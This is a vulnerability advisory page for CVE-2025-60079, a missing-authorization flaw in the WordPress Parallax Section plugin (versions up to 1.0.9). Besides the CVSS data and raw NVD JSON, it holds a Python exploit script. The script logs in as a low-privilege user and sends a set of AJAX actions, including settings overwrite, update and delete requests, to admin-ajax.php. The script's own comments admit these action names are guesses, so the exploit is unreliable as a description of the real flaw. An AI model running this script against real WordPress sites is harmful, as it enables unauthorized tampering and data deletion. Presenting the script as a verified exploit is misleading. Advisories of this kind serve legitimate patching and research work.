Security Vulnerability Report
中文
CVE-2025-60079 CVSS 7.1 HIGH

CVE-2025-60079

Published: 2025-12-18 08:16:08
Last Modified: 2026-04-27 16:16:32

Description

Missing Authorization vulnerability in bPlugins Parallax Section block parallax-section allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Parallax Section block: from n/a through <= 1.0.9.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H

Configurations (Affected Products)

No configuration data available.

parallax-section 插件所有版本 <= 1.0.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-60079 PoC - Missing Authorization in Parallax Section Plugin # Affected: parallax-section plugin <= 1.0.9 import requests import sys def exploit_cve_2025_60079(target_url, username, password): """ PoC for CVE-2025-60079: Missing Authorization vulnerability in WordPress Parallax Section plugin """ # Setup session session = requests.Session() # Step 1: Login to WordPress with low-privilege account login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } print("[*] Attempting to login as low-privilege user...") response = session.post(login_url, data=login_data, cookies={'wordpress_test_cookie': 'WP+Cookie+check'}) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Login failed!") return False print("[+] Login successful!") # Step 2: Exploit the missing authorization vulnerability # Try to access admin functionality through AJAX endpoint ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Common Parallax Section plugin actions that might be exploited exploit_payloads = [ {'action': 'parallax_section_save_settings', 'data': 'malicious_config'}, {'action': 'parallax_section_save_block', 'post_id': 1, 'block_data': '{"type":"parallax-section"}'}, {'action': 'parallax_section_delete', 'id': 1}, {'action': 'parallax_section_update', 'id': 1, 'settings': '{"admin_function":true}'}, ] print("[*] Attempting to exploit missing authorization...") for payload in exploit_payloads: try: response = session.post(ajax_url, data=payload, timeout=10) # Check if the request was processed (not blocked by auth) if response.status_code == 200: print(f"[!] Potential vulnerability confirmed: Action '{payload['action']}' processed") print(f"[*] Response: {response.text[:200]}") except requests.RequestException as e: print(f"[-] Request failed: {e}") print("[*] PoC execution completed") print("[*] Note: Further exploitation depends on specific vulnerable endpoint") return True # Usage example if __name__ == "__main__": if len(sys.argv) < 4: print("Usage: python poc.py <target_url> <username> <password>") print("Example: python poc.py http://example.com subscriber password123") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_cve_2025_60079(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60079", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:16:08.043", "lastModified": "2026-04-27T16:16:31.893", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in bPlugins Parallax Section block parallax-section allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Parallax Section block: from n/a through <= 1.0.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/parallax-section/vulnerability/wordpress-parallax-section-block-plugin-1-0-9-broken-authentication-vulnerability?_s_id=cve", "source": "[email protected]"}]}}